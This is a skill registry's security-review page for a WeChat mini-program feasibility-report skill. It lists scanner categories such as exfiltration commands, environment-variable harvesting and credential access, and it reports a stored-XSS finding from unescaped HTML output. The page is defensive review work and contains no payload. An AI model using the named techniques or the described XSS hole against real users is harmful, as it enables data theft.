ClawHub

微信小程序开发辅助决策助手

Security checks across malware telemetry and agentic risk

Overview

This skill coherently generates WeChat mini-program feasibility research reports, but users should treat generated HTML as untrusted because report content is not escaped.

Install only if you are comfortable with a skill that searches public sources and writes a local HTML report. Open generated reports cautiously, especially when they include competitor or web-sourced text, because the generator does not HTML-escape content; prefer reviewing the file path first and avoid opening reports from untrusted inputs in a browser profile with sensitive sessions.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • MCP Tool PoisoningHidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (2)

Description-Behavior Mismatch

Medium
Confidence
98% confidence
Finding
The report generator interpolates many attacker-controlled fields such as name, direction, keywords, competitor data, business model text, promotion text, and risk descriptions directly into an HTML document without escaping. If any of these inputs contain HTML or JavaScript, opening the generated report can trigger stored XSS/script execution in the viewer's browser or exfiltrate local/contextual data from the rendered report.

Missing User Warnings

Medium
Confidence
91% confidence
Finding
The skill omits a clear user warning that it writes an HTML report to disk, even though it uses Write and shows file output examples. Undisclosed filesystem writes can surprise users, overwrite files, or leave sensitive business analysis artifacts on disk where they may be exposed to other processes or users.

VirusTotal

65/65 vendors flagged this skill as clean.

View on VirusTotal